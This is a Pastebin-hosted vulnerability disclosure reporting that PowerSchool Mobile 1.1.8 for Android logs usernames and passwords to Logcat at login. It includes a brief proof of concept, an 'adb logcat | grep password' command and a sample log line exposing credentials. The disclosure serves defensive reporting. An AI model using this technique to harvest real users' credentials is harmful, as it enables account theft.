Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # Title: PowerSchool Mobile - Logging Sensitive Information
- # Application: PowerSchool Mobile
- # Version: 1.1.8
- # Software Link: https://play.google.com/store/apps/details?id=com.powerschool.portal
- # Company: PowerSchool Group LLC
- # Installs: 1,000,000+
- # Impact: Hackers can get username and password of the app by looking at the log
- # Category: Mobile Apps
- # Tested on: Android 8
- ---Description---
- PoweverSchool Mobile, the popular education app installed more than 1 million, logs username and password in Logcat during login step. So, hackers can obtain user password/ID of PowerSchool Mobile, simply looking at Logcat. Especially, in old Android versions prior to Android Jelly Bean, any app installed can access Logcat without any permission.
- ---Vendor feedback---
- We have reported this issue to the vendor, and they will fixed this problem soon.
- ---PoC---
- 1. Try to login in PowerSchool, entering username and password.
- 2. Search password in the log
- $ adb logcat | grep 'password'
- 11857 12122 D SoapCall: loginToPublicPortal request xml <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www...<username><![CDATA[jaeho.lee@rice.edu]]></username><password><![CDATA[myPasswordHere]]></password.</loginToPublicPortal></soap:Body></soap:Envelope>
- ---Reporter---
- Jaeho Lee(Jaeho.Lee@rice.edu)
- Rice University
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
